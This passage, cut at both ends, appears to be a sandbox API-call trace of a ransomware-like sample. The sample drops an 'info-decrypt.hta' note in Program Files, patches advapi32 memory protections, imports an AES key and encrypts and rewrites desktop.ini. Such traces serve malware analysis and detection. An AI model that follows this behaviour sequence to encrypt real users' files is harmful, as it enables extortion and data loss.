(dwNewMode=0x1, lpOldMode=0x6bcef7c) returned 1 [0136.467] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\info-decrypt.hta" (normalized: "c:\\program files\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6bceff8 | out: lpFileInformation=0x6bceff8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0136.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef78) returned 1 [0136.467] GetFullPathNameW (in: lpFileName="C:\\Program Files\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6bceb14, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\desktop.ini", lpFilePart=0x0) returned 0x1c [0136.468] GetFullPathNameW (in: lpFileName="C:\\Program Files\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6bce9bc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\info-decrypt.hta", lpFilePart=0x0) returned 0x21 [0136.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bceeb0) returned 1 [0136.469] CreateFileW (lpFileName="C:\\Program Files\\info-decrypt.hta" (normalized: "c:\\program files\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3a8 [0136.469] GetFileType (hFile=0x3a8) returned 0x1 [0136.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bceeac) returned 1 [0136.469] GetFileType (hFile=0x3a8) returned 0x1 [0136.474] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0136.474] WriteFile (in: hFile=0x3a8, lpBuffer=0x33eb67c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6bcef74, lpOverlapped=0x0 | out: lpBuffer=0x33eb67c*, lpNumberOfBytesWritten=0x6bcef74*=0x1000, lpOverlapped=0x0) returned 1 [0136.476] WriteFile (in: hFile=0x3a8, lpBuffer=0x33eb67c*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x6bcef48, lpOverlapped=0x0 | out: lpBuffer=0x33eb67c*, lpNumberOfBytesWritten=0x6bcef48*=0x557, lpOverlapped=0x0) returned 1 [0136.476] CloseHandle (hObject=0x3a8) returned 1 [0136.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6bcea98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\desktop.ini", lpFilePart=0x0) returned 0x1c [0136.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcef44) returned 1 [0136.495] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x33ec698 | out: lpFileInformation=0x33ec698*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae)) returned 1 [0136.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef40) returned 1 [0136.500] GetFullPathNameW (in: lpFileName="C:\\Program Files\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6bce984, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\desktop.ini", lpFilePart=0x0) returned 0x1c [0136.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee78) returned 1 [0136.500] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a8 [0136.501] GetFileType (hFile=0x3a8) returned 0x1 [0136.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcee74) returned 1 [0136.501] GetFileType (hFile=0x3a8) returned 0x1 [0136.501] GetFileSize (in: hFile=0x3a8, lpFileSizeHigh=0x6bcef80 | out: lpFileSizeHigh=0x6bcef80*=0x0) returned 0xae [0136.501] ReadFile (in: hFile=0x3a8, lpBuffer=0x33ec8bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6bcef2c, lpOverlapped=0x0 | out: lpBuffer=0x33ec8bc*, lpNumberOfBytesRead=0x6bcef2c*=0xae, lpOverlapped=0x0) returned 1 [0136.502] CloseHandle (hObject=0x3a8) returned 1 [0139.190] SysReAllocStringLen (in: pbstr=0x6bce288*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x6bce288*="advapi32") returned 1 [0139.190] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0139.190] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0139.192] GetLastError () returned 0x0 [0139.192] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0139.193] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0139.193] GetModuleFileNameA (in: hModule=0x77710000, lpFilename=0x6bce16c, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0139.193] GetCurrentProcess () returned 0xffffffff [0139.193] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x77711520, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x4, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x20) returned 0x0 [0139.194] GetCurrentProcess () returned 0xffffffff [0139.194] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x77711520, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x20, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x4) returned 0x0 [0139.194] GetCurrentProcess () returned 0xffffffff [0139.194] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x77711540, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x4, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x20) returned 0x0 [0139.194] GetCurrentProcess () returned 0xffffffff [0139.194] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x77711540, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x20, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x4) returned 0x0 [0139.195] GetCurrentProcess () returned 0xffffffff [0139.195] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x7771175c, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x4, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x20) returned 0x0 [0139.314] GetCurrentProcess () returned 0xffffffff [0139.314] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x7771175c, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x20, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x4) returned 0x0 [0139.315] GetCurrentProcess () returned 0xffffffff [0139.315] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x77711768, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x4, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x20) returned 0x0 [0139.315] GetCurrentProcess () returned 0xffffffff [0139.315] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x77711768, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x20, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x4) returned 0x0 [0139.316] GetCurrentProcess () returned 0xffffffff [0139.316] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x777117b8, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x4, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x20) returned 0x0 [0139.316] GetCurrentProcess () returned 0xffffffff [0139.316] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x777117b8, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x20, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x4) returned 0x0 [0139.317] GetCurrentProcess () returned 0xffffffff [0139.317] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x777117bc, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x4, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x20) returned 0x0 [0139.317] GetCurrentProcess () returned 0xffffffff [0139.317] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x777117bc, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x20, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x4) returned 0x0 [0139.318] GetCurrentProcess () returned 0xffffffff [0139.318] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x777117c8, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x4, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x20) returned 0x0 [0139.318] GetCurrentProcess () returned 0xffffffff [0139.318] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x777117c8, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x20, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x4) returned 0x0 [0139.319] GetCurrentProcess () returned 0xffffffff [0139.319] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x777117d0, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x4, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x20) returned 0x0 [0139.319] GetCurrentProcess () returned 0xffffffff [0139.319] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x777117d0, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x20, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x4) returned 0x0 [0139.320] GetCurrentProcess () returned 0xffffffff [0139.320] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x7771180c, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x4, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x20) returned 0x0 [0139.320] GetCurrentProcess () returned 0xffffffff [0139.320] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x7771180c, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x20, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x4) returned 0x0 [0139.321] GetCurrentProcess () returned 0xffffffff [0139.321] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x7771182c, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x4, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x20) returned 0x0 [0139.321] GetCurrentProcess () returned 0xffffffff [0139.321] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x7771182c, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x20, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x4) returned 0x0 [0139.322] GetCurrentProcess () returned 0xffffffff [0139.322] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x77711860, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x4, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x20) returned 0x0 [0139.322] GetCurrentProcess () returned 0xffffffff [0139.322] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bce270*=0x77711860, NumberOfBytesToProtect=0x6bce274, NewAccessProtection=0x20, OldAccessProtection=0x6bce2a8 | out: BaseAddress=0x6bce270*=0x77711000, NumberOfBytesToProtect=0x6bce274, OldAccessProtection=0x6bce2a8*=0x4) returned 0x0 [0139.323] SetLastError (dwErrCode=0x0) [0139.324] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContext") returned 0x0 [0139.324] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0139.324] CryptAcquireContextW (in: phProv=0x6bceecc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6bceecc*=0x6ee6b8) returned 1 [0139.464] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x1 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.464] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.464] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x1 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.464] CoTaskMemFree (pv=0x7acc28) [0139.464] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.464] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.464] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.464] CoTaskMemFree (pv=0x7acc28) [0139.464] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.464] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.464] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.465] CoTaskMemFree (pv=0x7acc28) [0139.465] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.465] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.465] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.465] CoTaskMemFree (pv=0x7acc28) [0139.465] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.465] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.465] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.465] CoTaskMemFree (pv=0x7acc28) [0139.465] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.465] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.465] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.465] CoTaskMemFree (pv=0x7acc28) [0139.465] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.465] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.465] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.465] CoTaskMemFree (pv=0x7acc28) [0139.465] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.466] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.466] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.466] CoTaskMemFree (pv=0x7acc28) [0139.466] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.466] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.466] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.466] CoTaskMemFree (pv=0x7acc28) [0139.466] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.466] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.466] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.466] CoTaskMemFree (pv=0x7acc28) [0139.466] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.466] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.466] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.466] CoTaskMemFree (pv=0x7acc28) [0139.466] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.466] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.466] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.467] CoTaskMemFree (pv=0x7acc28) [0139.467] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.467] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.467] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.467] CoTaskMemFree (pv=0x7acc28) [0139.467] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.467] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.467] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.467] CoTaskMemFree (pv=0x7acc28) [0139.467] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.467] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.467] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.467] CoTaskMemFree (pv=0x7acc28) [0139.467] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.467] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.467] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.467] CoTaskMemFree (pv=0x7acc28) [0139.467] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.467] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.468] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.468] CoTaskMemFree (pv=0x7acc28) [0139.468] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.468] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.468] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.468] CoTaskMemFree (pv=0x7acc28) [0139.468] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.468] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.468] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.468] CoTaskMemFree (pv=0x7acc28) [0139.468] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 1 [0139.468] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.468] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x6bcee90) returned 1 [0139.468] CoTaskMemFree (pv=0x7acc28) [0139.468] CryptGetProvParam (in: hProv=0x6ee6b8, dwParam=0x1, pbData=0x0, pdwDataLen=0x6bcee90, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6bcee90) returned 0 [0141.723] CryptGenRandom (in: hProv=0x6ee6b8, dwLen=0x10, pbBuffer=0x33ae994 | out: pbBuffer=0x33ae994) returned 1 [0144.467] CryptImportKey (in: hProv=0x6ee6b8, pbData=0x342f0f4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6bcee9c | out: phKey=0x6bcee9c*=0x77b1b0) returned 1 [0144.467] CryptContextAddRef (hProv=0x6ee6b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.467] CryptContextAddRef (hProv=0x6ee6b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.467] CryptDuplicateKey (in: hKey=0x77b1b0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6bcee8c | out: phKey=0x6bcee8c*=0x77b1f0) returned 1 [0144.468] CryptContextAddRef (hProv=0x6ee6b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.468] CryptSetKeyParam (hKey=0x77b1f0, dwParam=0x4, pbData=0x342f1d4*=0x1, dwFlags=0x0) returned 1 [0144.468] CryptSetKeyParam (hKey=0x77b1f0, dwParam=0x1, pbData=0x342f1a0, dwFlags=0x0) returned 1 [0144.468] CryptEncrypt (in: hKey=0x77b1f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x342f1e4*, pdwDataLen=0x6bceef8*=0xb0, dwBufLen=0xb0 | out: pbData=0x342f1e4*, pdwDataLen=0x6bceef8*=0xb0) returned 1 [0144.468] CryptEncrypt (in: hKey=0x77b1f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f2b8*, pdwDataLen=0x6bcef00*=0x0, dwBufLen=0x10 | out: pbData=0x342f2b8*, pdwDataLen=0x6bcef00*=0x10) returned 1 [0146.830] CryptDestroyKey (hKey=0x77b1b0) returned 1 [0146.830] CryptReleaseContext (hProv=0x6ee6b8, dwFlags=0x0) returned 1 [0146.830] CryptReleaseContext (hProv=0x6ee6b8, dwFlags=0x0) returned 1 [0146.830] GetFullPathNameW (in: lpFileName="C:\\Program Files\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6bce970, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\desktop.ini", lpFilePart=0x0) returned 0x1c [0146.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee64) returned 1 [0146.830] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0148.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcdca0) returned 1 [0148.069] CoTaskMemAlloc (cb=0x20c) returned 0x6f2e520 [0148.069] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x6f2e520 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0148.069] CoTaskMemFree (pv=0x6f2e520) [0148.069] GetFullPathNameW 